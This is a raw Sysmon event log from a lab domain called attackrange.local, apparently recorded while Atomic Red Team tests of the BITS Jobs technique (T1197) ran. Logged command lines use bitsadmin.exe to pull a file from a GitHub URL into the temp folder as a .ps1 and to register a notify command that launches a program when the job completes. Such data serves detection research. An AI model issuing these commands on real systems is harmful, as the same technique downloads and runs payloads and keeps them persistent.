16:33:11.072{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061727Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.072{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061726Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.072{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061725Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.072{7F8C56E7-4E4F-6063-5500-00000000AF01}38244020C:\Windows\system32\csrss.exe{7F8C56E7-52C7-6063-4001-00000000AF01}6008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061724Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.072{7F8C56E7-4F87-6063-C900-00000000AF01}56526096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7F8C56E7-52C7-6063-4001-00000000AF01}6008C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc612994(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc6127fb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc69b92c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc60aa81(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bd0db2d3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc5d0029(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc633a9b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc61593b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc60665b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc642cfe(wow64) 154100x80000000000000001061723Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.076{7F8C56E7-52C7-6063-4001-00000000AF01}6008C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %%temp%%\bitsadmin1_flag.ps1" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{7F8C56E7-4E65-6063-912A-070000000000}0x72a912HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{7F8C56E7-4F87-6063-C900-00000000AF01}5652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001061722Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.072{7F8C56E7-4F87-6063-C900-00000000AF01}5652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-03-30 16:33:11.072 11241100x80000000000000001061721Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:11.072{7F8C56E7-4F87-6063-C900-00000000AF01}5652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-03-30 16:33:11.072 23542300x8000000000000000246546Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:11.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1A03A67DF31E0E6D8B660E1FF9106FF,SHA256=505DD6D3D00BA25691D79DA81AA1AEB18A5D2E800406DDE5C20C53D071111399,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246545Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:09.583{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64825-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 354300x80000000000000001061868Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.022{7F8C56E7-4E39-6063-0100-00000000AF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54858-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local47001- 354300x80000000000000001061867Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.022{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54858-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local47001- 354300x80000000000000001061866Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:09.999{7F8C56E7-4E39-6063-0100-00000000AF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54857-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local47001- 354300x80000000000000001061865Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:09.999{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54857-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local47001- 23542300x80000000000000001061864Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.572{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=283871D00CD05372AC15AD031FFE15C8,SHA256=8C68318EF5E99C2690599E408C7A6B614B37CE9F205EF3AC314A43A335DCAC4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061863Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.572{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=D2867669270089E327C07E1B986244C2,SHA256=F1C1D21B50E7BA63CF97BB5227EE08EBE6019E073BA269C760A070EC89B34EA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061862Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.572{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=686F6D8419901B215AD0E882AC4093ED,SHA256=C17AABCE56A1C3AED870F1213770958A46AFE32E30168776F7A33732CF10F804,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061861Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.572{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=2B71D42028379FF9D8A2C4E877830A34,SHA256=DF2F1C5D9D09AF7A2A35AC679DD89E7D62CA98093D02D2CFEB34B169A1ED6C78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061860Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.525{7F8C56E7-4E3C-6063-1600-00000000AF01}1280NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\BITD243.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061859Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.494{7F8C56E7-4F87-6063-CA00-00000000AF01}55846056C:\Windows\system32\conhost.exe{7F8C56E7-52C8-6063-4801-00000000AF01}6028C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061858Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.494{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061857Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.494{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061856Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.494{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061855Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.494{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061854Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.494{7F8C56E7-4E4F-6063-5500-00000000AF01}38244020C:\Windows\system32\csrss.exe{7F8C56E7-52C8-6063-4801-00000000AF01}6028C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061853Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.494{7F8C56E7-52C8-6063-4301-00000000AF01}43924396C:\Windows\system32\cmd.exe{7F8C56E7-52C8-6063-4801-00000000AF01}6028C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8564|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+c347|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061852Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.496{7F8C56E7-52C8-6063-4801-00000000AF01}6028C:\Windows\System32\timeout.exe10.0.14393.0 (rs1_release.160715-1616)timeout - pauses command processingMicrosoft® Windows® Operating SystemMicrosoft Corporationtimeout.exetimeout 5 C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{7F8C56E7-4E65-6063-912A-070000000000}0x72a912HighMD5=FF04FB5121867334F841D5EFD133633B,SHA256=F9B3348029B76BBB658A097BF361EA72CEFA0D15CE444E9E8A689B35B67A78E7,IMPHASH=709A3AA304E78434B9FA3FE865133AD0{7F8C56E7-52C8-6063-4301-00000000AF01}4392C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /create AtomicBITS & bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %temp%\bitsadmin3_flag.ps1 & bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe "" & bitsadmin.exe /resume AtomicBITS & timeout 5 & bitsadmin.exe /complete AtomicBITS" 10341000x80000000000000001061851Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.478{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-52C8-6063-4701-00000000AF01}3712C:\Windows\system32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061850Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.478{7F8C56E7-4E3C-6063-1600-00000000AF01}12801520C:\Windows\system32\svchost.exe{7F8C56E7-52C8-6063-4701-00000000AF01}3712C:\Windows\system32\bitsadmin.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061849Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.478{7F8C56E7-4E3C-6063-1600-00000000AF01}12801320C:\Windows\system32\svchost.exe{7F8C56E7-52C8-6063-4701-00000000AF01}3712C:\Windows\system32\bitsadmin.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061848Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.463{7F8C56E7-4F87-6063-CA00-00000000AF01}55846056C:\Windows\system32\conhost.exe{7F8C56E7-52C8-6063-4701-00000000AF01}3712C:\Windows\system32\bitsadmin.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061847Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.463{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061846Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:12.463{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061845Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 